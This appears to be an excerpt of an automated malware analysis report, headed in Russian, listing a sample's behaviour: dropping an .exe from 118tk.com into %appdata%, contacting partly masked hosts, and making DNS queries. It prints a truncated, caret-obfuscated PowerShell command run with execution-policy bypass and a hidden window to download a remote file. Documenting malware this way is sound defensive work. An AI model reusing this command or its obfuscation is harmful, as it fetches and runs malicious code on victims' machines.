Техническая информация
- http://118tk.com/topic/_derived/ahor8xfp/mcfxa6rd.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^W^eRShE^LL^.E^xE ^-EXeC^uTi^oNPoL^IcY B^yPaSs^ ^-NoPr^oFi^le -^W^in^do^w^styLE HId^de^n^ (new^-^O^bjE^c^t^ ^S^yStem.neT.w^E^Bc^l^iEnt^).D^ownloA^Dfi^le^(^'http://118tk.com/t...
- '11##k.com':80
- 'yy#####4.ak47csgo.net':118
- http://11##k.com/topic/_derived/AHor8xfp/mCFXa6rD.exe
- 'yy#####4.ak47csgo.net':118
- DNS ASK 11##k.com
- DNS ASK yy#####4.ak47csgo.net
- '<SYSTEM32>\cmd.exe' /c "Po^W^eRShE^LL^.E^xE ^-EXeC^uTi^oNPoL^IcY B^yPaSs^ ^-NoPr^oFi^le -^W^in^do^w^styLE HId^de^n^ (new^-^O^bjE^c^t^ ^S^yStem.neT.w^E^Bc^l^iEnt^).D^ownloA^Dfi^le^(^'http://118tk.com/t... (со скрытым окном)